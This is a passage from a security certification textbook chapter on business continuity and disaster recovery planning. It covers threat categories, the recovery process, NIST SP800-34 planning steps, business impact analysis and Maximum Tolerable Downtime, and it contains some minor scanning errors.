Operations Plan ( COOP), Occupant Emergency Plan ( OEP), and others. 

The Business Continuity Plan attends to ensuring that the business is viable 
before, during, and after significant disruptive events. This continued viability would 
not be possible without being able to quickly recover critical systems, which is fun- 
damentally what a Disaster Recovery Plan provides. An additional means of differ- 
entiating between a Business Continuity Plan and a Disaster Recovery Plan is that 
the BCP is more holistic in that it is not as overtly systems-focused as the DRP, but 
rather takes into account items such as people, vital records, and processes in addi- 
tion to critical systems. 
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FIGURE 8.11 BCP and Related Plans [9] 


One means of distinguishing Business Continuity Plan from the Disaster Recov- 
ery Plan is realizing that the BCP is concerned with the business-critical function or 
service provided as opposed to the systems that might typically allow that function to 
be performed. While this might seem an academic distinction in the modern systems- 
centric organizations common today, consider the role that email plays in most orga- 
nizations. While most technical persons would consider email to be business-critical, 
many organizations could continue to operate, albeit painfully, without email. While 
a DRP would certainly take into account email systems, the BCP might be less con- 
cerned with email for its own sake, and more concerned with providing service to 
customers via other communication. Appreciating this distinction is important to an 
organization, as it will ultimately help guide considerations such as Maximum Toler- 
able Downtime (MTD), which will, in turn, be used as an input when determining 
how to allocate resources and architect recovery strategies. 

DISASTERS OR DISRUPTIVE EVENTS 

Given that organizations’ Business Continuity and Disaster Recovery Plans are 
created because of the potential of disasters impacting operations, understanding 
disasters and disruptive events is necessary. The most obvious types of disruptive 
events that spring to mind when considering BCP and DRP are that of natural 
disasters such as hurricanes, tornadoes, earthquakes, floods, etc. While these are 
representative of some types of disasters, they are far from the only, or even the most 
common, types of disruptive events. 
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One way of classifying the types of disasters that can occur is by categorizing 

them by cause. The three common ways of categorizing the causes for disasters are 

whether the threat agent is natural, human, or environmental in nature. [10] 

• Natural — The most obvious type of threat that can result in a disaster are 
naturally occurring. This category includes threats such as earthquakes, 
hurricanes, tornadoes, floods, and some types of fires. Historically, natural 
disasters have provided some of the most devastating disasters that an 
organization can have to respond to. However, natural disasters are typically less 
common than are the other classes of threats. The likelihood of a natural threat 
occurring is usually closely related to the geographical location. 

• Human — The human category of threats represents the most common source 
of disasters. Human threats can be further classified by whether they constitute 
an intentional or unintentional threat. Human-intentional attacks represent 
deliberate, motivated attacks by a human. Human-unintentional attacks are 
those in which a person unwittingly served as a threat source. For example, an 
attacker targeting an organization’s cardholder data by attempting to cause a 
malware infection within the organization would represent a human-intentional 
threat; an employee disrupted operations through laziness or carelessness would 
be considered a human-unintentional threat. While human-intentional threats 
might be more exciting to run through threat models, human-unintentional 
threats represent the most common source of disasters. Examples of human- 
intentional threats include terrorists, malware, rogue insider. Denial of Service, 
hacktivism, phishing, social engineering, etc. Examples of human-unintentional 
threats are primarily those that involve inadvertent errors and omissions, in 
which the person through lack of knowledge, laziness, or carelessness served as 
a source of disruption. 

• Environmental — The name environmental threats can be confusing, bringing 
to mind weather-related phenomena. In this case environmental has little to do 
with the weather (which would be considered a natural threat) and is focused 
on environment as it pertains to the information systems or datacenter. The 
threat of disruption to the computing environment is significant. This class of 
threat includes items such as power issues (blackout, brownout, surge, spike), 
system component or other equipment failures, and application or software 
flaws. 


NOTE 

Technical threats are another category of threat. Technical threats can be considered a subset of 
human threats, but are sometimes referenced separately due to their importance to information 
security. Common examples of technical threats include malware, Denial of Service, cyber- warfare, 
cyber-terrorism, hacktivism, phishing, DNS hijacking, etc. These threats are mitigated with the 
Cyber Incident Response Plan. 
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Table 8.2 Examples of Disruptive Events 


Disruptive Event 

Type 

Earthquake/Tornado/Hurricane/etc. 

Strike 

Cyber terrorism 

Malware 

Denial of Service 

Errors and Omissions 

Electrical Fire 

Equipment failure 

Natural 

Human (intentional) 

Human (intentional)FTechnical 

Human (intentional)FTechnical 

Human (intentional)FTechnical 

Human (unintentional) 

Environmental 

Environmental 


The analysis of threats and determination of the associated likelihood of the 
threats being manifested is an important part of the BCP and DRP process. Appre- 
ciation of the threats will help guide some of the potential risk mitigation or avoid- 
ance strategies adopted by the organization. Further, threat analysis will help provide 
guidance in the planning and prioritization of recovery and response capabilities. In 
order to be able to perform these threat analyses, a more detailed understanding of 
the types of threats is needed. Table 8.2 provides a quick summary of some of the 
disaster events and what type of disaster they constitute. 

Errors and Omissions 

Errors and omissions are typically considered the single most common source of dis- 
ruptive events. Humans, often employed by the organization, unintentionally cause 
this type of threat. Data entry mistakes are an example of errors and omissions. These 
mistakes can be costly to an organization, and might require manual review prior to 
being put into production, which would be an example of separation of duties. 


NOTE 

Though errors and omissions are the most common threat faced by an organization, they also 
represent the type of threat that can be most easily avoided. If an organization can determine the 
particular types of errors or omissions that are especially common, or especially damaging, then 
the organization can typically build in controls that can help mitigate the risk of this threat being 
realized. The organization would be reducing its vulnerability to a particularly significant error or 
omission. 


Natural Disasters 

Natural disasters include earthquakes, hurricanes, floods, tsunamis, etc. In order to 
craft an appropriate response and recovery strategy in the BCP and DRP, an under- 
standing of the likelihood of occurrence of a natural disaster is needed. The likeli- 
hood of natural threats occurring is largely based upon the geographical location of 
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the organization’s information systems or datacenters. Natural disasters generally 
have a rather low likelihood of occurring. However, when they do happen, the impact 
can be severe. See Chapter 4, Domain 3: Security Engineering for additional infor- 
mation on these risks as well as specific strategies for mitigating them. 

Electrical or Power Problems 

While natural disasters are often associated with the most catastrophic events that 
an organization might ever have to deal with, power problems represent much more 
commonly occurring threats that can cause significant disruptions within an orga- 
nization. When power problems do occur, they typically affect the availability of a 
system or organization. Integrity issues can also crop up on disk drives as a result 
of sudden power loss; however, modern transaction-based or journaling hie systems 
have greatly reduced these integrity issues. 

Power or electrical issues are some of the most commonly occurring disaster 
events that will impact a datacenter. For additional details on electrical problems as 
well as methods to mitigate some of these problems see the Electricity section in 
Chapter 4, Domain 3: Security Engineering. 

Temperature and Humidity Failures 

Temperature and humidity are critical controls that must be managed during a 
disaster. While it is obvious that information systems must have a regular clean 
power supply in order to maintain their availability, the modern datacenter must also 
provide sufficient heating, cooling, ventilation, and air conditioning. Proper cooling 
and humidity levels are critical. 

Older datacenters were designed with different computing systems (such as main- 
frames) in mind than is found currently. The ubiquity of blade and 1U servers has 
greatly increased the resources that can be packed into a rack or a datacenter. While 
this greater density and the ability to have more computing power per square foot is 
desirable, this greatly increased server density can create significant heat issues. In 
order to provide for proper and consistent temperature, a datacenter will require an 
HVAC system that can handle the ever-increasing server density. 

An additional concern that arises from the conditioned (heated or cooled) air 
being used in a datacenter is the humidity levels. Without proper and consistent 
temperature as well appropriate relative humidity levels, the Mean Time Between 
Failures (MTBF) for electrical equipment will decrease. If the MTBF decreases, 
this means that equipment will fail with greater regularity, which can represent more 
frequent disaster events. Good datacenter design and sufficient HVAC can help to 
decrease the likelihood of these threats being able to impact an organization. 


LEARN BY EXAMPLE 

Testing Backup Power and HVAC 

While all datacenters have cooling issues or concerns, cooling issues for datacenters in Mississippi 
during the month of August can be particularly interesting. All organizations recognize that loss of 
power represents a commonly occurring disruptive event, whether it is as a result of human error, 
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natural disaster, or something in between. In order to accommodate the potential short-lived loss 
of power without causing significant impact, organizations typically employ uninterruptible power 
supplies (UPS) and/or backup generators. 

After going through a datacenter refresh that involved HVAC upgrades, powered racks with 
dedicated UPS, cable management (previously lacking), etc., a Mississippi-based organization 
felt that power failure testing was necessary. In the event of loss of power the organization’s 
design was to automatically switch servers to the new rack-mounted UPS systems, bring up 
the generator, and then have an operator begin shutting down unnecessary servers to prolong 
their ability to run without power. The test that was being performed was simply to ensure that 
systems would automatically failover to the UPS, to ensure that the generator would come up, 
and to ensure that the new process of operators shutting down unnecessary systems worked 
properly. 

After separating the datacenter from power, the rack-mounted UPS immediately kicked in. 

The generator started up without a hitch. Operators broke the seal on their shutdown procedures 
and began gracefully shutting down unnecessary servers. However, the operators quickly started 
complaining about how hot the task of shutting down these systems was. While stress can make 
people feel a bit warmer, the datacenter director investigated the matter. He found that they had been 
so focused on ensuring that all of the server systems would stay operational until being gracefully 
shut down, and that they had neglected the new chillers in the datacenter, which had not been 
considered in the power failure. With hundreds of servers running, no chillers, and a 105° F heat 
index outdoors, it likely got hot rather quickly. 


Warfare, Terrorism and Sabotage 

The height of human-intentional threats is found in the examples of warfare, terror- 
ism, and sabotage. The threat of traditional warfare, terrorism, and sabotage to our 
organizations can vary dramatically based on geographic location, industry, brand 
value, as well as the interrelatedness with other high-value target organizations. 
While traditional physical attacks are still quite possible, an even more likely sce- 
nario is cyber-warfare, terrorism, or sabotage. The threat landscape for information 
systems has rapidly evolved over the years. 

While the threat of information warfare, or terrorists targeting information sys- 
tems, might have only been the stuff of thriller novels several years ago, these threat 
sources have expanded both their capabilities and motivations. Every month (and 
sometimes every week) news headlines suggest nation state involvement as a legiti- 
mate, and likely, threat source. Though it would be reasonable to assume that only 
critical infrastructure, government, or contractor systems would be targeted by this 
style of attacks, this assumption is unfounded. Organizations that have little to noth- 
ing to do with the military, governments at large, or critical infrastructure are also 
regular targets of these types of attacks. 

This is illustrated by the “Aurora” attacks (named after the word “Aurora,” which 
was found in a sample of the malware used in the attacks). As the New York Times 
reported on 2/18/2010: “A series of online attacks on Google and dozens of other 
American corporations have been traced to computers at two educational institutions 
in China, including one with close ties to the Chinese military, say people involved 
in the investigation.” [11] 
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Financially Motivated Attackers 

Another recent trend that impacts threat analyses is the greater presence of financially 
motivated attackers. The attackers have come up with numerous ways to monetize 
attacks against various types of organizations. This monetization of cybercrime has 
increased the popularity of such attacks. Whether the goal is money via exfiltration of 
cardholder data, identity theft, pump-and-dump stock schemes, bogus anti-malware 
tools, or corporate espionage, the trend is clear that attackers understand methods that 
allow them to yield significant profits via attacks on information systems. One of the 
more disturbing prospects is the realization that organized crime syndicates now play 
a substantial role as the source of these financially motivated attacks. The justification 
for organized crime’s adoption of cybercrime is obvious. With cybercrime, there is 
significant potential for monetary gain with a greatly reduced risk of being caught, 
or successfully prosecuted if caught. With respect to BCP and DRP, an appreciation 
of the significant changes in the threat sources’ capabilities and motivations will help 
guide the risk assessment portions of the planning process. 


LEARN BY EXAMPLE 

Targeted Attacks 

Many organizations still believe that attackers are not targeting them. Even more would argue that they 
do not represent high-value targets to organized criminals, terrorists, or foreign nation states. It is easy 
to refuse to consider one’s own organization as a likely target of attack. In the same way that the most 
vulnerable in society are often targets of identity theft, attackers also target family-owned businesses. 
While compromising a small family-owned restaurant might not net the attacker the millions of credit 
cards, these smaller targets are often less likely to have either the preventive or detective capabilities 
to thwart the attacker or even know that the attack has taken place. If attackers can make money by 
targeting a smaller business, then they will. Virtually every organization is a target. 

In an August 29, 2009 article titled “European Cyber-Gangs Target Small U.S. Firms, Group Says,” 
the Washington Post reported: “Organized cyber-gangs in Eastern Europe are increasingly preying 
on small and mid-size companies in the United States, setting off a multimillion-dollar online crime 
wave that has begun to worry the nation’s largest financial institutions. . .In July, a school district near 
Pittsburgh sued to recover $700,000 taken from it. In May, a Texas company was robbed of $1.2 million. 
An electronics testing firm in Baton Rouge, La., said it was bilked of nearly $100,000.” [12] 


Personnel Shortages 

Another threat source that can result in disaster is found in issues related to person- 
nel shortages. Though most of the discussions of threats until this point have been 
related to threats to the operational viability of information systems, another signifi- 
cant source of disruption can come by means of having staff unavailable. While some 
systems can persist with limited administrative oversight, most organizations will 
have some critical processes that are people-dependent. 

Pandemics and Disease 

The most significant threat likely to cause major personnel shortages, while not caus- 
ing other significant physical issues, is found in the possibility of major biological 
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problems such as pandemic flu or highly communicable infectious disease out- 
breaks. Epidemics and pandemics of infectious disease have caused major devasta- 
tion throughout history. A pandemic occurs when an infection spreads through an 
extremely large geographical area, while an epidemic is more localized. There have 
been relatively few epidemics or pandemics since the advent of ubiquitous infor- 
mation systems. Luckily, most of the recent epidemics or pandemics have had an 
extremely low mortality rate and/or have not been as easily transmitted between 
humans. 

In 2009, the H1N1 strain of the influenza vims, also known as swine flu, reached 
pandemic status as determined by the World Health Organization. This pandemic 
raised organizations’ concerns about how a significant outbreak could greatly limit 
staff availability, as employees would stay home to care of sick family members, 
stay home because of worry about coming into contact with an infected person, or 
stay home because they themselves had contracted the vims. Though the fears about 
widespread staffing shortages were thankfully unrealized, the threat motivated many 
organizations to more effectively plan for the eventual pandemic that does cause that 
level of staffing shortages. 

Strikes 

Beyond personnel availability issues related to possible pandemics, strikes are 
another significant source of personnel shortages. Strikes by workers can prove 
extremely disruptive to business operations. One positive about strikes is that they 
usually are carried out in such a manner that the organization can plan for the 
occurrence. Most strikes are announced and planned in advance, which provides 
the organization with some lead-time, albeit not enough to assuage all financial 
impact related to the strike. 

Personnel Availability 

Another personnel-related issue is that, while perhaps not as extreme as a strike, can 
still prove highly disruptive is the sudden separation from employment of a critical 
member of the workforce. Whether the employee was fired, suffered a major illness, 
died, or hit the lottery, the resulting lack of availability can cause disruption if the 
organization was underprepared for this critical member’s departure. 

Communications Failure 

Dependence upon communications without sufficient backup plans represents a 
common vulnerability that has grown with the increasing dependence on call cen- 
ters, IP telephony, general Internet access, and providing services via the Internet. 
With this heightened dependence, any failure in communication equipment or con- 
nectivity can quickly become disastrous for an organization. There are many threats 
to an organization’s communications infrastructure, but one of the most common 
disaster-causing events that occur with regularity is telecommunication lines being 
inadvertently cut by someone digging where they are not supposed to. Physical line 
breaks can cause significant outages. 
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LEARN BY EXAMPLE 

Internet2 Outage 

One of the eye-opening impacts of Hurricane Katrina was a rather significant outage of Intemet2, 
which provides high-speed connectivity for education and research networks. Qwest, which 
provides the infrastructure for Internet2, suffered an outage in one of the major long-haul links that 
ran from Atlanta to Houston. Reportedly, the outage was due to lack of availability of fuel in the 
area. [13] In addition to this outage, which impacted more than just those areas directly affected by 
the hurricane, there were substantial outages throughout Mississippi, which at its peak had more 
than a third of its public address space rendered unreachable. [14] 


THE DISASTER RECOVERY PROCESS 

Having discussed the importance of Business Continuity and Disaster Recovery 
Planning as well as examples of threats that justify this degree of planning, we will 
now focus on the fundamental steps involved in recovering from a disaster. By first 
covering the methodology of responding to a disaster event, a better understanding 
of the elements to be considered in the development of a BCP/DRP will be possible. 

The general process of disaster recovery involves responding to the disruption; 
activation of the recovery team; ongoing tactical communication of the status of 
disaster and its associated recovery; further assessment of the damage caused by the 
disruptive event; and recovery of critical assets and processes in a manner consis- 
tent with the extent of the disaster. Different organizations and experts alike might 
disagree about the number or names of phases in the process, but, generally, the 
processes employed are much more similar than their names are divergent. 

One point that can often be overlooked when focusing on disasters and their 
associated recovery is to ensure that personnel safety remains the top priority. The 
safety of an organization’s personnel should be guaranteed at the expense of efficient 
or even successful restoration of operations or recovery of data. Safety should always 
trump business concerns. 

Respond 

In order to begin the disaster recovery process, there must be an initial response that 
begins the process of assessing the damage. Speed is essential during this initial 
assessment. There will be time later, should the event warrant significant recovery 
initiatives, to more thoroughly assess the full scope of the disaster. 

The initial assessment will determine if the event in question constitutes a disas- 
ter. Further, a quick assessment as to whether data and/or systems can be recovered 
quickly enough to avoid the use of an alternate processing facility would be useful, 
but is not always determinable at this point. If there is little doubt that an alternate 
facility will be necessary, then the sooner this fact can be communicated, the better 
for the recoverability of the systems. Again, the initial response team should also be 
mindful of assessing the facility’s safety for continued personnel usage, or seeking 
the counsel of those suitably trained for safety assessments of this nature. 
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Activate Team 

If during the initial response to a disruptive event a disaster is declared, then the team 
that will be responsible for recovery needs to be activated. Depending on the scope 
of the disaster, this communication could prove extremely difficult. The use of call- 
ing trees, which will be discussed in the “Call Trees” section later in this chapter, can 
help to facilitate this process to ensure that members can be activated as smoothly 
as possible. 

Communicate 

After the successful activation of the disaster recovery team, it is likely that many 
individuals will be working in parallel on different aspects of the overall recovery 
process. One of the most difficult aspects of disaster recovery is ensuring that consis- 
tent timely status updates are communicated back to the central team managing the 
response and recovery process. This communication often must occur out-of-band, 
meaning that the typical communication method of leveraging an office phone will 
quite often not be a viable option. In addition to communication of internal status 
regarding the recovery activities, the organization must be prepared to provide 
external communications, which involves disseminating details regarding the orga- 
nization’s recovery status with the public. 

Assess 

Though an initial assessment was carried out during the initial response portion 
of the disaster recovery process, the (now activated) disaster recovery team will 
perform a more detailed and thorough assessment. The team will proceed to assess 
the extent of the damage to determine the proper steps necessary to ensure the 
organization’s ability to meet its mission and Maximum Tolerable Downtime 
(MTD). Depending upon whether and what type of alternate computing facilities 
are available, the team could recommend that the ultimate restoration or reconsti- 
tution occurs at the alternate site. An additional aspect of the assessment not to be 
overlooked is the need to continually be mindful of ensuring the ongoing safety of 
organizational personnel. 

Reconstitution 

The primary goal of the reconstitution phase is to successfully recover critical 
business operations either at primary or secondary site. If an alternate site is 
leveraged, adequate safety and security controls must be in place in order to maintain 
the expected degree of security the organization typically employs. The use of an 
alternate computing facility for recovery should not expose the organization to 
further security incidents. In addition to the recovery team’s efforts at reconstitution 
of critical business functions at an alternate location, a salvage team will be employed 
to begin the recovery process at the primary facility that experienced the disaster. 
Ultimately, the expectation is (unless wholly unwarranted given the circumstances), 
that the primary site will be recovered, and that the alternate facility’s operations will 
“fail back” or be transferred again to the primary center of operations. 
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DEVELOPING A BCP/DRP 

Developing a BCP/DRP is vital for an organization’s ability to respond and 
recover from an interruption in normal business functions or catastrophic event. 
In order to ensure that all planning has been considered, the BCP/DRP has a spe- 
cific set of requirements to review and implement. Below are listed these high- 
level steps, according to NIST SP800-34, to achieving a sound, logical BCP/DRP. 
NIST SP800-34 is the National Institute of Standards and Technologies Contin- 
gency Planning Guide for Federal Information Systems, which can be found at 
http://csrc.nist.gov/publications/nistpubs/800-34-revl/sp800-34-revl_errata-Novl 1- 
2010.pdf. 

• Project Initiation 

• Scope the Project 

• Business Impact Analysis 

• Identify Preventive Controls 

• Recovery Strategy 

• Plan Design and Development 

• Implementation, Training, and Testing 

• BCP/DRP Maintenance [15] 


LEARN BY EXAMPLE 

Assessing Communications Risks 

The home of United States Pacific Command (PACOM), the U.S. Military combatant command 
responsible for the Pacific region of the world, is located on Oahu, Hawaii. Combatant commands 
play a vital role in the U.S. military’s overall mission. Oahu has limited power, personnel, and 
Internet connectivity due to its island environment. If PACOM wanted to create a BCP/DRP that 
addressed all the risks involved with operations on an island like Oahu, what should they consider? 
How much is PACOM dependent on the island of Oahu to provide communications services for 
military operations? 

At the time of PACOM initiating BCP/DRP planning, it was determined that there were 
only four active communication submarine fiber optic cables that connect all of Hawaii’s 
communications. According to the International Cable Protection Committee (see: https:// 
www.iscpc.org/cable-data/), contrary to what most people think, satellite communications 
only provide about 5% of the total communications traffic to and from Hawaii. [16] Ninety- 
five percent are conducted over long fiber optic cables that span from Hawaii to California, 
Washington State, Japan, and Australia. Each cable connects to the island’s infrastructure at 
just two physical junctures on the island. A natural disaster such as a tsunami or typhoon could 
damage the connection points and render the entire island without IT or standard telephonic 
communications. Through PACOM’s business impact analysis, it was also discovered that each 
connection point’s physical security was fenced but no with guards or alarms. This meant that 
PACOM was vulnerable not only to natural physical threats but to malicious human threats as 
well. It was a result of PACOM’s BCP/DRP development effort that led to this vulnerability 
being discovered. 



Developing a BCP/DRP 395 


PROJECT INITIATION 

In order to develop the BCP/DRP, the scope of the project must be determined and 
agreed upon. This involves seven distinct milestones [17] as listed below: 

1 . Develop the contingency planning policy statement'. A formal department or 
agency policy provides the authority and guidance necessary to develop an 
effective contingency plan. 

2 . Conduct the business impact analysis (BIA): The BIA helps to identify and 
prioritize critical IT systems and components. A template for developing the 
BIA is also provided to assist the user. 

3 . Identify preventive controls'. Measures taken to reduce the effects of system 
disruptions can increase system availability and reduce contingency life cycle costs. 

4 . Develop recovery strategies: Thorough recovery strategies ensure that the 
system may be recovered quickly and effectively following a disruption. 

5 . Develop an IT contingency plan: The contingency plan should contain detailed 
guidance and procedures for restoring a damaged system. 

6 . Plan testing, training, and exercises: Testing the plan identifies planning gaps, 
whereas training prepares recovery personnel for plan activation; both activities 
improve plan effectiveness and overall agency preparedness. 

7 . Plan maintenance: The plan should be a living document that is updated 
regularly to remain current with system enhancements. [18] 

Implementing software and application recovery can be the most difficult for 
organizations facing a disaster event. Hardware is relatively easy to obtain. Specific 
software baselines and configurations with user data can be extremely difficult to im- 
plement if not planned for before the event occurs. Figure 8.12 shows the BCP/DRP 
process, actions, and personnel involved with the plan creation and implementation. 
IT is a major part of any organizational BCP/DRP but, as Figure 8.12 shows, it is not 
the only concern for C-level managers. In fact, IT is called upon to provide support 
to those parts of the organization directly fulfilling the business mission. IT has 
particular responsibilities when faced with a disruption in business operations because 
the organization’s communications depend so heavily on the IT infrastructure. As 
you review Figure 8.12, also note that the IT BCP/DRP will have a direct impact 
on the entire organization’s response during an emergency event. The top line of 
Figure 8.12 shows the organization-wide BCP/DRP process; below that is the IT 
BCP/DRP process. You can see through the arrows how each is connected to the other. 

Management Support 

It goes without saying that any BCP/DRP is worthless without the consent of the 
upper level management team. The “C”-level managers must agree to any plan set 
forth and also must agree to support the action items listed in the plan if an emer- 
gency event occurs. C-level management refers to people within an organization 
like the chief executive officer (CEO), the chief operating officer (COO), the chief 
information officer (CIO), and the chief financial officer (CFO). C-level managers 
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FIGURE 8.12 The BCP/DRP Process 


are important, especially during a disruptive event, because they have enough power 
and authority to speak for the entire organization when dealing with outside media 
and are high enough within the organization to commit resources necessary to move 
from the disaster into recovery if outside resources are required. This also includes 
getting agreement for spending the necessary resources to reconstitute the organiza- 
tion’s necessary functionality. 

Another reason that the C-level management may want to conduct a BCP/ 
DRP project for the organization is to identify process improvements and increase 
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efficiency within the organization. Once the BCP/DRP project development plan has 
been completed, the management will be able to determine which portions of the 
organization are highly productive and are aware of all of the impacts they have on 
the rest of the organization and how other entities within the organization affect them. 

BCP/DRP Project Manager 

The BCP/DRP project manager is the key Point of Contact (POC) for ensuring that a 
BCP/DRP is not only completed, but also routinely tested. This person needs to have 
business skills, be extremely competent and knowledgeable with regard to the orga- 
nization and its mission, and must be a good manager and leader in case there is an 
event that causes the BCP or DRP to be implemented. In most cases, the project man- 
ager is the Point of Contact for every person within the organization during a crisis. 

Organizational skills are necessary to manage such a daunting task, as these 
are very important, and the project manager must be very organized. The most 
important quality of the project manager is that he/she has credibility and enough 
authority within the organization to make important, critical decisions with regard 
to implementing the BCP/DRP. Surprisingly enough, this person does not need to 
have in-depth technical skills. Instead, some technical knowledge is required but, 
most importantly, the project manager needs to have the negotiation and people skills 
necessary to create and disseminate the BCP/DRP among all the stakeholders within 
the organization. 

Building The BCP/DRP Team 

Building the BCP/DRP team is essential for the organization. The BCP/DRP team 
comprises those personnel that will have responsibilities if/when an emergency 
occurs. Before identification of the BCP/DRP personnel can take place, the Continu- 
ity Planning Project Team (CPPT) must be assembled. The CPPT is comprised of 
stakeholders within an organization and focuses on identifying who would need to 
play a role if a specific emergency event were to occur. This includes people from the 
human resources section, public relations (PR), IT staff, physical security, line man- 
agers, essential personnel for full business effectiveness, and anyone else responsible 
for essential functions. Also, depending on the type of emergency, different people 
may have to play a different role. For example, in an IT emergency event that only 
affected the internal workings of the organization, PR may not have a vital role. 
However, any emergency that affects customers or the general public would require 
PR’s direct involvement. 

Some difficult issues with regards to planning for the CPPT are how to handle 
the manager/employee relationship. In many software and IT-related business- 
es, employees are “matrixed.” A matrixed organization leverages the expertise of 
employees by having them work numerous projects under many different manage- 
ment chains of command. For example: employee John Smith is working on four dif- 
ferent projects for four different managers. Who will take responsibility for John in 
the event of an emergency? These types of questions will be answered by the CPPT. 
It is the planning team that finds answers to organizational questions such as the 
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above example. It should be understood and planned that, in an emergency situation, 
people become difficult to manage. 

SCOPING THE PROJECT 

Properly scoping the BCP/DRP is crucial and difficult. Scoping means to define 
exactly what assets are protected by the plan, which emergency events this plan will 
be able to address, and finally determining the resources necessary to completely 
create and implement the plan. Many players within the organization will have to be 
involved when scoping the project to ensure that all portions of the organization are 
represented. Specific questions will need to be asked of the BCP/DRP planning team 
like, “What is in and out of scope for this plan?” 

After receiving C-level approval and input from the rest of the organization, 
objectives and deliverables can then be determined. These objectives are usually 
created as “if/then” statements. For example, “If there is a hurricane, then the 
organization will enact plan H — the Physical Relocation and Employee Safety 
Plan.” Plan H is unique to the organization but it does encompass all the BCP/DRP 
sub plans required. An objective would be to create this plan and have it reviewed 
by all members of the organization by a specific date. This objective will have 
a number of deliverables required to create and fully vet this plan: for example, 
draft documents, exercise-planning meetings, tabletop preliminary exercises, etc. 
Each organization will have its own unique set of objectives and deliverables when 
creating the BCP/DRP depending on the organization’s needs. 

Executive management must at least ensure that support is given for three BCP/ 
DRP items: 

1 . Executive management support is needed for initiating the plan. 

2. Executive management support is needed for final approval of the plan. 

3. Executive management must demonstrate due care and due diligence and be 
held liable under applicable laws/regulations. 

ASSESSING THE CRITICAL STATE 

Assessing the critical state can be difficult because determining which pieces of the 
IT infrastructure are critical depends solely on the how it supports the users within 
the organization. For example, without consulting all of the users, a simple mapping 
program may not seem to be critical assets for an organization. However, if there is 
a user group that drives trucks and makes deliveries for business purposes, this map- 
ping software may be critical for them to schedule pick-ups and deliveries. 

Listed in Table 8.3 is a list of example critical assets. Also notice that, when 
compiling the critical state and asset list associated with it, the BCP/DRP project 
manager should note how the assets impact the organization in a section called the 
“Business Impact” section. 

As you see in Table 8.3, not all IT assets have the same critical state. Within the 
Critical State asset list, it is encouraged that the BCP/DRP project manager use a 
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Table 8.3 Example Critical State IT Asset List 


IT Asset 

User Group 
Affected 

Business 

Process Affected 

Business Impact 

Mapping 
Software V2.8 

Delivery Drivers 

On-time delivery of 
goods 

Customer relations and trust 
may be damaged 

Time Keeping 
System V3.0 

All employees 

Time keeping 
and payment for 
employees 

Late paychecks tolerable for a 
very short period (Max 5 days). 
Employees may walk off job site 
or worse 

Lotus Notes 

Executive 

Financial group 

Mild impact, financial group can 

Internal 

message 

system 

board, finance, 
accounting 

communications 
with executive 
committee 

also use email to communicate 


qualitative approach when documenting the assets, groups, processes, and impacts. 
During the business impact analysis, a quantitative measurement will be determined 
to associate with the impact of each entry. 

CONDUCT BUSINESS IMPACT ANALYSIS (BIA) 

The Business Impact Analysis (BIA) is the formal method for determining how a dis- 
ruption to the IT system(s) of an organization will impact the organization’s require- 
ments, processes, and interdependencies with respect the business mission. [19] It is 
an analysis to identify and prioritize critical IT systems and components. It enables 
the BCP/DRP project manager to fully characterize the IT contingency requirements 
and priorities. [20] The objective is to correlate the IT system components with the 
critical service it supports. It also aims to quantify the consequence of a disruption 
to the system component and how that will affect the organization. The primary goal 
of the BIA is to determine the Maximum Tolerable Downtime (MTD) for a specific 
IT asset. This will directly impact what disaster recovery solution is chosen. For 
example, an IT asset that can only suffer a loss of service of 24 hours will have to 
utilize a warm recovery site at a minimum in order to prevent catastrophic loss in the 
event of a disruption. 

Another benefit of conducting the BIA is that it also provides information to 
improve business processes and efficiencies because it details all of the organiza- 
tion’s policies and implementation efforts. If there are inefficiencies in the business 
process, the BIA will reflect that. 


EXAM WARNING 


The BIA is comprised of two processes. First, identification of critical assets must occur. Second, a 
comprehensive risk assessment is conducted. 
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Identify Critical Assets 

Remember, the BIA and Critical State Asset List is conducted for every IT system 
within the organization, no matter how trivial or unimportant. This is to ensure that 
each system has been accounted for. Once the list is assembled and users and user 
representatives have received input, the critical asset list can be created. The critical 
asset list is a list of those IT assets that are deemed business-essential by the organi- 
zation. These systems’ DRP/BCP must have the best available recovery capabilities 
assigned to them. 

Conduct BCP/DRP-focused Risk Assessment 

The BCP/DRP-focused risk assessment determines what risks are inherent to which 
IT assets. A vulnerability analysis is also conducted for each IT system and major 
application. This is done because most traditional BCP/DRP evaluations focus on 
physical security threats, both natural and human. However, because of the nature of 
Internet-connected IT systems, the risk of a disruption occurring is much greater and 
therefore, must be mitigated. 

Table 8.4 demonstrates a basic risk assessment for a company’s email system. In 
this example case, the company is using Microsoft Exchange and has approximately 
100 users. Notice that each mitigation tactic will have an effect on the overall risk by 
accepting, reducing, eliminating, or transferring the risk. Risk assessment and miti- 
gation are covered in depth in Chapter 2, Domain 1 : Security and Risk Management. 

Determine Maximum Tolerable Downtime 

The primary goal of the BIA is to determine the Maximum Tolerable Down- 
time (MTD), which describes the total time a system can be inoperable before an 
organization is severely impacted. It is the maximum time it takes to execute the 

Table 8.4 Risk Assessment for Company X’s Email System 


Risk Assessment 
Finding 

Vulnerability 

BIA 

Mitigation 

Server located in 

Physical access 

Potentially cause loss 

Install hardware 

unlocked room 

by unauthorized 
persons 

of Confidentiality, 

Integrity and Availability 
(CIA) for email system 
through physical attack 
on the system 

locks with PIN 
and alarm system 
(risk is reduced to 
acceptable level) 

Software is two 

This version is 

Loss of CIA for email 

Update system 

versions out of 

insecure and has 

system through cyber 

software (risk is 

date 

reached end of life 
from vendor 

attack 

eliminated) 

No Firewall 

Exposure to 

Loss of CIA for email 

Move email server 

solution 

Internet without 

system through cyber 

into a managed 

implemented / no 
DMZ 

FW increases 
cyber threat greatly 

attack 

hosting site (risk is 
transferred to hosting 
organization) 
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reconstitution phase. Reconstitution is the process of moving an organization from 
the disaster recovery to business operations. 

Maximum Tolerable Downtime is comprised of two metrics: the Recovery Time 
Objective (RTO), and the Work Recovery Time (WRT) (see below). 

Alternate terms for MTD 

Depending on the business continuity framework that is used, other terms may be 
substituted for Maximum Tolerable Downtime. These include Maximum Allowable 
Downtime (MAD), Maximum Tolerable Outage (MTO), and Maximum Acceptable 
Outage (MAO). 

Though there may be slight differences in definition, the terms are substantially 
the same, and are sometimes used interchangeably. For the purposes of consistency, 
the term MTD will be used in this chapter. 


LEARN BY EXAMPLE 

The Importance of Payroll 

An IT security instructor was teaching a group of Air Force IT technicians. At the time, the 
instructor was attempting to teach the Air Force techs how to prioritize which IT systems should 
be reconstituted in the event of a disruption. In one of the exercises, the IT techs rated the payroll 
system as being of the utmost importance for fighting the war and no other war fighting system 
could take precedence over the payroll system. When the instructor asked the IT techs why this was 
the case, they said, “If we don’t get paid, then we’re not fighting. . . That’s why the payroll system is 
the most important. Without it, we are going to lose the war!” 

This is a true story and an excellent point to consider especially when planning for payroll 
